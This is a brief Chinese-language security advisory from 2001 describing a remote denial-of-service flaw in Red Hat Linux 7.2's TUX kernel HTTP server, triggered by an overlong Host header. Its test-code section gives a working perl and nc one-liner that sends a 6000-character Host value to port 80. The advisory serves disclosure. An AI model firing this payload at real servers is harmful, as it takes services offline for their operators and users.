TUX HTTPD 在HOST参数中存在拒绝服务攻击发布时间:2001-11-06 更新时间:2001-11-06 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 RedHat Linux 7.2:详细描述 TUX(http://www.redhat.com/docs/manuals/tux/)是内核空间HTTP服务程序, 优化了操作性能。其中在HOST参数中存在漏洞,如果通过HTTP GET提交 超长的参数给HOST域并向目标机器发送请求,可以导致拒绝服务攻击。 测试代码 perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 . qq(\n)" |nc 80 解决方案 尚无 相关信息 a.orawe at ntlworld.com |
